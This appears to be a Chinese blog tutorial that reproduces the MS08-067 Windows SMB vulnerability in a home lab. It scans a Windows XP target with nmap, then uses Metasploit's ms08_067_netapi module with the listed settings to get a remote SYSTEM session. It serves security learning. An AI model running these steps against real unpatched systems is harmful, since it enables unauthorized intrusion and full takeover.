MS08-067漏洞复现

前言

漏洞描述:

        Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。

       kali下载:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

       Windows xp下载:https://pan.baidu.com/s/13wyedDfuZdgkjgYgVCnYTA?pwd=csb6 
        提取码:csb6 

        备用windows xp下载:MSDN, 我告诉你 - 做一个安静的工具站(此站系统可能已修复此漏洞)

1、环境搭建

kali进入管理员用户:sudo su默认密码为:kali(密码不可见)

MS08-067漏洞复现_第1张图片

攻击机kali IP:192.168.13.128 

查询方法:终端输入指令ifconfig

靶机Windows xp SP3 IP:192.168.13.132

查询方法:win+r输入cmd打开命令窗口输入ipconfig

MS08-067漏洞复现_第2张图片

查询两台主机是否互通:用kali 输入 ping 192.168.13.132 -c 4

-c 4:4次测试后停止

MS08-067漏洞复现_第3张图片

2、信息收集

使用nmap工具扫描目标机端口

代码:nmap -A -T4 -sV 192.168.13.132

  -A 选项用于使用进攻性(Aggressive)方式扫描;

  -T4 指定扫描过程使用的时序(Timing),T4表示快速扫描。

  总共有6个级别(0-5),级别越高,速度越快,但也容易被防火墙发现;

   -sV:获取对应端口上更为详细的服务版本信息

MS08-067漏洞复现_第4张图片
 

可以看到开放的端口有445、139、443等等,操作系统为Windows xp等信息。

MS08-067漏洞复现_第5张图片

3、漏洞利用

尝试利用ms08-067漏洞使用软件Metasploit

Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。

打开msf软件命令:msfconsole

MS08-067漏洞复现_第6张图片

查找ms08-067攻击载荷

MS08-067漏洞复现_第7张图片

使用攻击载荷:use 0 或use exploit/windows/smb/ms08_067_netapi

查看必选配置项(Required为yes为必选配置)

MS08-067漏洞复现_第8张图片

配置目标IP:set rhosts 192.168.13.132

查询系统版本对应编号:show targets

MS08-067漏洞复现_第9张图片

我们的靶机系统是Windows xp sp3所以选择7

配置目标系统版本:set target 7

配置攻击载荷

启动程序:run或exploit

MS08-067漏洞复现_第10张图片

4、后渗透攻击

输入?查看我们能干什么

MS08-067漏洞复现_第11张图片

你可能感兴趣的:(黑客技术,安全,安全性测试)